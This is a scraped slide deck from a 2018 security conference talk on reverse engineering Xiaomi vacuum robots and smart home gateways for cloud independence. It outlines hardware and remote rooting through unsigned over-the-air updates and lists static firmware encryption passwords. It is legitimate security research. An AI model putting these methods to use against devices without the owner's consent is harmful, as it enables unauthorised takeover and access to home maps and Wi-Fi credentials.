reversing iot
play

Reversing IoT: Xiaomi Ecosystem Gain cloud independence and - PowerPoint PPT Presentation

Feb 07, 2023 •130 likes •1.51k views

Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0) Outline Introduction Xiaomi Cloud Devices and Rooting Vacuum Cleaning Robot Smart Home

  1. Backside layout mainboard LIDAR UART R16 UART (115200 baud) Tx STM UART Rx (921600 baud) Tx 38 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  2. Frontside layout mainboard (GEN2) R16 512 MB STM32 SOC RAM MCU 4GB WiFi Module eMMC Flash 39 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  3. Rooting • Usual (possibly destructive) way to retrieve the firmware 40 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  4. Rooting • Usual (possibly destructive) way to retrieve the firmware 41 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  5. Rooting Our weapon of choice: 42 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  6. Pin Layout CPU UART0 MMC2 MMC1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 MMC Reset D6 D4 D2 D0 D2 D0 CLK TX UART1 A D7 D5 D3 D1 D3 D1 RX CMD B CLK SDA TWI1 C RX TX SCL CMD D E Recov Confir UART2 ery m F RX TX G Line IN L H LINE J IN R PHO NE IN K PHO NE IN L PHO MIC1 M NE P PHO MIC2 N NE P SDA SCK RESET RSB0 P R USB- USB- LCD9 LCD7 LCD5 LCD3 LCD1 USB 1 DM0 DP0 T USB USB- USB- LCD8 LCD6 LCD4 LCD2 LCD0 DRV DM1 DP1 USB 2 U DRAM VCC/VDD GND LCD 43 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  7. Rooting Initial Idea: • Shortcut the MMC data lines • SoC falls back to FEL mode • Load + Execute tool in RAM – Via USB connector – Dump MMC flash – Modify image – Rewrite image to flash 44 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  8. Software • Ubuntu 14.04.3 LTS (Kernel 3.4.xxx) – Mostly untouched, patched on a regular base • Player 3.10-svn – Open-Source Cross-platform robot device interface & server • Proprietary software (/opt/rockrobo) – AppProxy – RoboController – Miio_Client – Custom adbd-version • iptables firewall enabled – Blocks Port 22 (SSHd) + Port 6665 (player) 45 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  9. Available data on device • Data – Logfiles (syslogs, duration, area, ssid, passwd) – “/ usr/sbin/tcpdump -i any -s 0 -c 2000 –w” – Maps – Multiple MBytes/day • Data is uploaded to cloud • Factory reset – Restores recovery to system – Does not delete data • Maps, Logs still exist 46 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  10. Available data on device • Maps – Created by player – 1024px * 1024px – 1px = 5cm 47 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  11. Available data on device Northeastern University, ISEC Building, 6th floor 48 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  12. Communication relations <-soundpackages, firmware compass uart_lds uart_mcu maps,logs-> *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 ot.io.mi.com:80(tcp) wifimgr ott.io.mi.com:8053(udp) RoboController <-commands, AES encrypted Miio_client reports-> (local):54322 (tcp) AppProxy Android/ 0.0.0.0:54321 (udp) iPhone App Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 49 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  13. eMMC Layout Label Content Size in MByte boot-res bitmaps & some wav files 8 env uboot cmd line 16 app device.conf (DID, key, MAC), adb.conf, vinda 16 recovery fallback copy of OS 512 system_a copy of OS (active by default) 512 system_b copy of OS (passive by default) 512 Download temporary unpacked OS update 528 reserve config + calibration files, blackbox.db 16 UDISK/Data logs, maps, pcap files ~1900 50 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  14. eMMC Layout Label Content Size in MByte boot-res bitmaps & some wav files 8 env uboot cmd line 16 app device.conf (DID, key, MAC), adb.conf, vinda 16 recovery fallback copy of OS 512 system_a copy of OS (active by default) 512 system_b copy of OS (passive by default) 512 Download temporary unpacked OS update 528 reserve config + calibration files, blackbox.db 16 UDISK/Data logs, maps, pcap files ~1900 51 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  15. Update process 52 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  16. Update process miIO.ota {"mode":"normal “, "install":"1", "app_url":"https://[URL]/v11_[version].pkg", "file_md5":“[md5]",”proc":" dnld install“} 53 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  17. Update process 54 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  18. Update process Active system_a copy system_b Download Data 2. Download [app_url] 55 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  19. Update process Active system_a copy system_b Download Data 2. Download [app_url] 56 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  20. Update process Active system_a copy system_b Download Data 57 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  21. Update process Active system_a copy system_b Download Data MD5 ok? 58 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  22. Update process Active system_a copy system_b Download Data Decrypt + image OK? 59 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  23. Update process Active system_a copy system_b Download Data Unpack + dd 60 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  24. Update process Active system_a copy system_b Update root pw Download in /etc/shadow Data 61 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  25. Update process Active system_a copy system_b Download dd Data 62 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  26. Update process Active system_a copy system_b Download Data rebooting … 63 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  27. Update process system_a Active system_b copy Download Data rebooting … 64 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  28. Update process system_a dd Active system_b copy Download Data 65 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  29. Update process system_a Active system_b copy Download Data 66 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  30. Firmware updates • Full and partial images – Encrypted tar.gz archives – Full image contains disk.img • 512 Mbyte ext4-filesystem • Encryption – Static password: “ rockrobo ” – Ccrypt [256-bit Rijndael encryption (AES)] • Integrity – MD5 provided by cloud 67 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  31. Firmware updates • Full and partial images – Encrypted tar.gz archives – Full image contains disk.img • 512 Mbyte ext4-filesystem • Encryption Sound Packages Static password: “r0ckrobo#23456” – Static password: “ rockrobo ” – Ccrypt [256-bit Rijndael encryption (AES)] • Integrity – MD5 provided by cloud 68 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  32. 69 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  33. Lets root remotely • Preparation: Rebuild Firmware – Include authorized_keys – Remove iptables rule for sshd • Send „ miIO.ota “ command to vacuum – Encrypted with token • From app or unprovisioned state – Pointing to own http server 70 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  34. Lets root remotely unprovisioned state Webserver 71 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  35. Lets root remotely „ Get Token“ unprovisioned state Webserver 72 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  36. Lets root remotely „ Get Token“ unprovisioned state Webserver 73 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  37. Lets root remotely „ Get Token“ „ miIO.ota “ unprovisioned state Webserver 74 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  38. Lets root remotely „ Get Token“ „ miIO.ota “ unprovisioned state Webserver 75 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  39. Lets root remotely „ Get Token“ „ miIO.ota “ Webserver 76 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  40. SSH 77 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  41. 78 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  42. 79 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  43. 80 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  44. 81 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  45. 82 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  46. Gain Independence Xiaomi Cloud Two methods: • Replacing the cloud interface • Proxy cloud communication 83 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  47. Replacing the cloud interface compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 ot.io.mi.com:80(tcp) wifimgr ott.io.mi.com:8053(udp) RoboController <-commands, My cloud client Miio_client reports-> (local):54322 (tcp) (local):54322 (tcp) AppProxy Android/ 0.0.0.0:54321 (udp) https, mqtt , etc… iPhone App Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 84 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  48. Replacing the cloud interface compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 wifimgr RoboController <-commands, reports-> AppProxy Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 85 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  49. Replacing the cloud interface compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 wifimgr RoboController <-commands, My cloud client reports-> (local):54322 (tcp) AppProxy FHEM https, mqtt , etc… Home Assistant Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 86 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  50. Replacing the cloud interface compass uart_lds uart_mcu player 0.0.0.0:6665 wifimgr RoboController <-commands, My cloud client reports-> (local):54322 (tcp) AppProxy FHEM https, mqtt , etc… Home Assistant /etc/hosts Robot intern IPC 127.0.0.1 awsbj0... plain json (tcp) 127.0.0.1 aswbj0- files… enc(key) json (tcp/udp) 127.0.0.1 cdn.cnbj0…. enc(token) json (udp) 87 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  51. Proxy cloud communication compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 ot.io.mi.com:80(tcp) wifimgr ott.io.mi.com:8053(udp) RoboController <-commands, Miio_client reports-> (local):54322 (tcp) AppProxy Android/ 0.0.0.0:54321 (udp) iPhone App Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 88 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  52. Proxy cloud communication compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 ot.io.mi.com:80(tcp) wifimgr ott.io.mi.com:8053(udp) RoboController <-commands, Miio_client reports-> (local):54322 (tcp) AppProxy Android/ 0.0.0.0:54321 (udp) iPhone App Robot intern IPC plain json (tcp) enc(key) json (tcp/udp) enc(token) json (udp) 89 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  53. Proxy cloud communication compass uart_lds uart_mcu *.fds.api.xiaomi.com (https) player 0.0.0.0:6665 ot.io.mi.com:80(tcp) wifimgr ott.io.mi.com:8053(udp) Dustcloud RoboController <-commands, Miio_client reports-> (local):54322 (tcp) AppProxy Android/ 0.0.0.0:54321 (udp) iPhone App Robot intern IPC /etc/hosts plain json (tcp) enc(key) json (tcp/udp) 130.83.x.x ot.io.mi.com enc(token) json (udp) 130.83.x.x ot.io.mi.com 90 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  54. Summary of the Vacuum • Rooting – Remote ! • Cloud Connection – Run without cloud – Run with your own cloud • Our goal: We want the Cloudkeys! 91 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  55. SMART HOME GATEWAY, LIGHTBULBS AND LED STRIPS 92 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  56. Xiaomi Ecosystem HTTPS Xiaomi Cloud ZigBee Gateway 93 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  57. Xiaomi Ecosystem HTTPS Xiaomi Cloud ZigBee Gateway 94 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  58. Overview Hardware • Application-MCU: Marvell 88MW30x – ARM Cortex-M4F @ 200 MHz – RAM : 512KByte SRAM – QSPI interface, supports XIP – Flash : 16 MByte (Gateway) • 4 Mbyte SPI (LED Strip, Lightbulb) – Integrated 802.11b/g/n WiFi Core • Zigbee-MCU: NXP JN5169 (Gateway only) – 32-bit RISC CPU – RAM: 32 kB – Flash: 512 kB embedded Flash, 4 kB EEPROM 95 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  59. Sensors connected via gateway Zigbee (NXP JN5169) based • Door Sensor (Reed contact) • Temperature sensor • Power Plug • Motion Sensor • Button • Smoke Detector • Smart Door Lock • … 96 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  60. Acquiring the Key • PCB got lots of testing points • SWD is enabled by default SDCLK SDIO RST TX* GND RX* *UART We can get the key from the memdump 97 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  61. Acquiring the Key • Can we get the Key without a hardware attack? • Firmware updates are not signed … 98 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  62. Acquiring the Key • Can we get the Key without a hardware attack? • Firmware updates are not signed … 99 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  63. Acquiring the Key • Can we get the Key without a hardware attack? • Firmware updates are not signed … Lets create a modified firmware which gives us the key automatically! 100 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

Recommend

Cross-platform reversing with Frida Ole Andr Vadla Ravns Cross-platform reversing with Frida

Cross-platform reversing with Frida Ole Andr Vadla Ravns Cross-platform reversing with Frida

Cross-platform reversing with Frida Ole Andr Vadla Ravns Cross-platform reversing with Frida Motivation Existing tools often not a good fit for the task at hand Creating a new tool usually takes too much effort Short feedback

1.17k views • 37 slides
Reversing a firmware uploader &amp; Others NFC stories 1

Reversing a firmware uploader &amp; Others NFC stories 1

7/1/2019 Reversing a Firmware uploader &amp; others NFC stories Reversing a firmware uploader &amp; Others NFC stories 1 file:///D:/projects/pts2019/dist/index.html 1/41 7/1/2019 Reversing a Firmware uploader &amp; others NFC stories

920 views • 41 slides
Reversing early retirement in Reversing early retirement in OECD countries Bernhard Ebbinghaus

Reversing early retirement in Reversing early retirement in OECD countries Bernhard Ebbinghaus

Reversing early retirement in Reversing early retirement in OECD countries Bernhard Ebbinghaus Mannheim Centre for European Social Research (MZES) University of Mannheim www.mzes.uni-mannheim.de www.mzes.uni mannheim.de Overcoming early exit

380 views • 9 slides
Reversing Java (Malware) with Radare Adam Pridgen April 2014 About me Rice SecLab, a PhD

Reversing Java (Malware) with Radare Adam Pridgen April 2014 About me Rice SecLab, a PhD

Reversing Java (Malware) with Radare Adam Pridgen April 2014 About me Rice SecLab, a PhD Student Independent InfoSec Consultant/Contractor Overview Typical Java Reversing Talk o Decompile Code o Make Changes o Recompile and Win?

868 views • 66 slides
Active Reversing Andrew Schaffer Greg Hoglund The goal Solve reverse engineering problems as

Active Reversing Andrew Schaffer Greg Hoglund The goal Solve reverse engineering problems as

Active Reversing Andrew Schaffer Greg Hoglund The goal Solve reverse engineering problems as quickly as possible without having to read disassembled code Advantages Active Reversing reveals contextual relationships between user actions,

1.41k views • 91 slides
Reversing Land Degrada.on in Landlocked Countries

Reversing Land Degrada.on in Landlocked Countries

Reversing Land Degrada.on in Landlocked Countries Magda Lovei Prac&amp;ce Manager for Environment and Natural Resources, World Bank I. Present

461 views • 18 slides
Reversing Hydraulic Fan Drives Stephen Frantz Staff Engineer Danfoss Power Solutions 1 1

Reversing Hydraulic Fan Drives Stephen Frantz Staff Engineer Danfoss Power Solutions 1 1

Reversing Hydraulic Fan Drives Stephen Frantz Staff Engineer Danfoss Power Solutions 1 1 Benefits/Requirements for a Reversing Hydraulic Fan Drive Requirements Benefits Returns to forward in the event of a control signal loss Increased

280 views • 15 slides
Cross-platform reversing with at NoConName December 2015 by oleavr Who am I? My name is Ole

Cross-platform reversing with at NoConName December 2015 by oleavr Who am I? My name is Ole

Cross-platform reversing with at NoConName December 2015 by oleavr Who am I? My name is Ole Andr Vadla Ravns Author of Frida, CryptoShark, oSpy, libmimic... Developer, Hacker and Reverse Engineer Currently working at

1.26k views • 43 slides
FunCap RAPID REVERSING WITH IDA PRO DEBUGGER ANDRZEJ DERESZOWSKI Who am I ? Security consultant

FunCap RAPID REVERSING WITH IDA PRO DEBUGGER ANDRZEJ DERESZOWSKI Who am I ? Security consultant

FunCap RAPID REVERSING WITH IDA PRO DEBUGGER ANDRZEJ DERESZOWSKI Who am I ? Security consultant with focus on incident handling, forensics and malware analysis Not a dedicated reverser RE is just part of my job =&gt; I avoid RE as much as

670 views • 15 slides
Reversing the trend Collaboration, Robustness and Standardization 2017 BSEE Standards

Reversing the trend Collaboration, Robustness and Standardization 2017 BSEE Standards

Reversing the trend Collaboration, Robustness and Standardization 2017 BSEE Standards Workshop, Houston May 5th 2017 By Dr.ing Geir Loeland. Head of Structural Integrity Section Petroleum Safety Authority Norway PTIL/PSA Topics included

196 views • 16 slides
Reversing Ocean Hypoxia through Application and Scaling up of Innovative Policy, Economic and

Reversing Ocean Hypoxia through Application and Scaling up of Innovative Policy, Economic and

Reversing Ocean Hypoxia through Application and Scaling up of Innovative Policy, Economic and Financial Tools Andrew Hudson Head, UNDP Water &amp; Ocean Governance Programme &amp; UN-Oceans Coordinator Haber-Bosch Process 1909 Atmos N 2 +

127 views • 8 slides
Reversing ng the he E Exodus Thr hrough h Cult ltivation n LETS TALK KANSAS There are

Reversing ng the he E Exodus Thr hrough h Cult ltivation n LETS TALK KANSAS There are

Reversing ng the he E Exodus Thr hrough h Cult ltivation n LETS TALK KANSAS There are 626 626 incorporated communities in the state of . Of those, nearly 91 91% have a population of Kans nsas. . Additionally, 75% 75% have

490 views • 18 slides
Reversing the Decay of American Air Power Roots of the Air Power Rot Wrong Missions :

Reversing the Decay of American Air Power Roots of the Air Power Rot Wrong Missions :

Pierre Sprey Weapons Analyst and Participant in F-16 &amp; A-10 Design Reversing the Decay of American Air Power Roots of the Air Power Rot Wrong Missions : Dominance of Strategic Bombing and Douhet Wrong Aircraft : Too Few, Too

370 views • 17 slides
Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android

Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android

NDSS 2019 @ San Diego, US Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android Daniele Antonioli 1 , Nils Ole Tippenhauer 2 , Kasper Rasmussen 3 1 Singapore University of Technology and Design (SUTD) 2

671 views • 29 slides
Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Martin Gallo Core

Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Martin Gallo Core

Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Martin Gallo Core Security Defcon 20 July 2012 P A G E Agenda Introduction Motivation and related work SAP Netweaver architecture and protocols layout

785 views • 41 slides
Maternal Mortality: Trends, Causes, &amp; Approaches to Reversing the Trend Carol J. Rowland

Maternal Mortality: Trends, Causes, &amp; Approaches to Reversing the Trend Carol J. Rowland

Maternal Mortality: Trends, Causes, &amp; Approaches to Reversing the Trend Carol J. Rowland Hogue, PhD, MPH Terry Professor of MCH &amp; Professor of Epidemiology Rollins School of Public Health Emory University September 24, 2018

441 views • 31 slides
FNSBSD SPECIAL EDUCATION OUR MISSION As a department, we are committed to reversing the trend

FNSBSD SPECIAL EDUCATION OUR MISSION As a department, we are committed to reversing the trend

FNSBSD SPECIAL EDUCATION OUR MISSION As a department, we are committed to reversing the trend of isolation and segregation of students with disabilities by ensuring all students have access to high quality instruction responsive to their

407 views • 17 slides
YOUR FIRST STEP TO REVERSING NIRVANA Agenda Introduction Why TitanMist? Human aspect of

YOUR FIRST STEP TO REVERSING NIRVANA Agenda Introduction Why TitanMist? Human aspect of

BlackHat USA 2010, Las Vegas Mario Vuksan &amp; Tomislav Pericin TITANMIST: YOUR FIRST STEP TO REVERSING NIRVANA Agenda Introduction Why TitanMist? Human aspect of the security industry Introduction and review of known formats

937 views • 47 slides
When Virtual Hell Freezes Over- Reversing C++ Code &lt;3 Gal Zaban @0xgalz id;whoami Gal

When Virtual Hell Freezes Over- Reversing C++ Code &lt;3 Gal Zaban @0xgalz id;whoami Gal

When Virtual Hell Freezes Over- Reversing C++ Code &lt;3 Gal Zaban @0xgalz id;whoami Gal Zaban Reverse Engineer Security Researcher at Viral Security Group In my spare-time I like sewing This is my own private research

919 views • 56 slides
Reversing Lists Haskell: The craft of functional programming, by Simon Thompson, page 140

Reversing Lists Haskell: The craft of functional programming, by Simon Thompson, page 140

Reversing Lists Haskell: The craft of functional programming, by Simon Thompson, page 140 Reverse.hs rev :: [t] -&gt; [t] rev [] = [] rev (e:l) = (rev l) ++ [e] 600000 rev [1..n] n**2/2 500000 400000 300000 200000 100000

347 views • 17 slides
Reversing a Japanese Wireless SD Card From Zero to Code Execution Guillaume VALADON - @guedou ?

Reversing a Japanese Wireless SD Card From Zero to Code Execution Guillaume VALADON - @guedou ?

Reversing a Japanese Wireless SD Card From Zero to Code Execution Guillaume VALADON - @guedou ? 2015 2018 2 ? ? 3 Get the slides at https://goo.gl/oijvdN 4 Toshiba FlashAir 5 See

1.5k views • 101 slides
Anatomy of a Massive P2P Botnet Takedown: Reversing and Attacking GameOver Zeus Dennis Andriesse

Anatomy of a Massive P2P Botnet Takedown: Reversing and Attacking GameOver Zeus Dennis Andriesse

Anatomy of a Massive P2P Botnet Takedown: Reversing and Attacking GameOver Zeus Dennis Andriesse Vrije Universiteit Amsterdam Finse Winter School 2018 Acknowledgements Brett Stone-Gross (Dell SecureWorks) Tillmann Werner, Christian Dietrich

1.02k views • 99 slides
Fuzzing, Reversing and Maths \x01/1 AGENDA \x02/2 \x03/3 WHO WE ARE Josep Pi Rodrguez

Fuzzing, Reversing and Maths \x01/1 AGENDA \x02/2 \x03/3 WHO WE ARE Josep Pi Rodrguez

Fuzzing, Reversing and Maths \x01/1 AGENDA \x02/2 \x03/3 WHO WE ARE Josep Pi Rodrguez a.k.a delorean Pedro Guilln Nez a.k.a. p3r1k0 Penetration tester and Security Penetration tester and Security researcher at Deloitte /

1.08k views • 86 slides
Reversing the Tide: Tracking and Responding to Opioid Misuse State Mandatory Review of PDMP by

Reversing the Tide: Tracking and Responding to Opioid Misuse State Mandatory Review of PDMP by

Reversing the Tide: Tracking and Responding to Opioid Misuse State Mandatory Review of PDMP by Providers and Pain Clinic Law Reduces ED Visits and Inpatient Stays for Opioid Overdose Kun Zhang, Ph.D. Health Scientist 06/27/2017 Annual

608 views • 27 slides

More recommend